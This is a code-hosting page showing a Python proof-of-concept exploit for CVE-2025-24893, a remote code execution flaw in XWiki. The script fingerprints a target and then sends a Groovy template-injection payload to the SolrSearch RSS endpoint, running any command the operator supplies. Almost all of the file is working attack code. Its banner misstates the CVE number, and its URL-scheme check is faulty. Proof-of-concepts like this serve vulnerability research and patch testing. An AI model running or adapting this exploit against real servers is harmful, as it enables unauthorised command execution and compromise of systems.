0xvoodoo/PoCs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
CVE-2025-24071
PoCs/CVE-2025-24893/CVE-2025-24893.py
T

60 lines
2.0 KiB
Python
Raw Permalink Blame History

import requests
import argparse
import urllib.parse
# Pretty colors :)
RED = "\033[31m"
GREEN = "\033[32m"
YELLOW = "\033[33m"
BOLD = "\033[1m"
RESET = "\033[0m"
def testVuln(target):
try:
resp = requests.get(target)
except requests.exceptions.RequestException as error:
print(f"{BOLD}{RED}[-]{RESET} Error connecting to host!")
raise SystemExit(error)
if "xwiki" not in resp.text.lower():
print(f"{BOLD}{RED}[-]{RESET} Error, site does not appear to be using XWiki")
return False
else:
return True
def exploit(target, cmd):
payload = urllib.parse.quote(f'}}}}{{{{async async=false}}}}{{{{groovy}}}}"{cmd}".execute(){{{{/groovy}}}}{{{{/async}}}}')
exploitUrl = f'{target}/xwiki/bin/get/Main/SolrSearch?media=rss&text={payload}'
try:
print(f"{BOLD}{YELLOW}[*]{RESET} Attempting exploit!")
resp = requests.get(exploitUrl)
except requests.exceptions.RequestException as error:
print(f"{BOLD}{RED}[-]{RESET} Site may not be vulnerable, or is unreachable!")
raise SystemExit(error)
print(f"{BOLD}{GREEN}[+]{RESET} Request successful, check for exploitation!")
if __name__ == "__main__":
parser = argparse.ArgumentParser(prog='CVE-2025-24893.py',
description='This is a PoC for CVE-2025-24893, a remote code execution vulnerability in XWiki',
epilog='PoC by 0xVoodoo - Don\'t be a skid :)' )
parser.add_argument('-t', '--target', required=True, help='Target IP/URL')
parser.add_argument('-c', '--command', required=True, help='Command to execute')
args = parser.parse_args()
print(f"{BOLD}{YELLOW}[*]{RESET} CVE-2025-24839 PoC by 0xVoodoo")
tgt = args.target.lower()
if tgt[4] != "http" and tgt[5] != "https":
print(f"{BOLD}{YELLOW}[*]{RESET} No URL schema specified, defaulting to HTTP")
tgt = 'http://' + tgt
if testVuln(tgt):
exploit(tgt, args.command)
else:
raise SystemExit()
Reference in New Issue View Git Blame Copy Permalink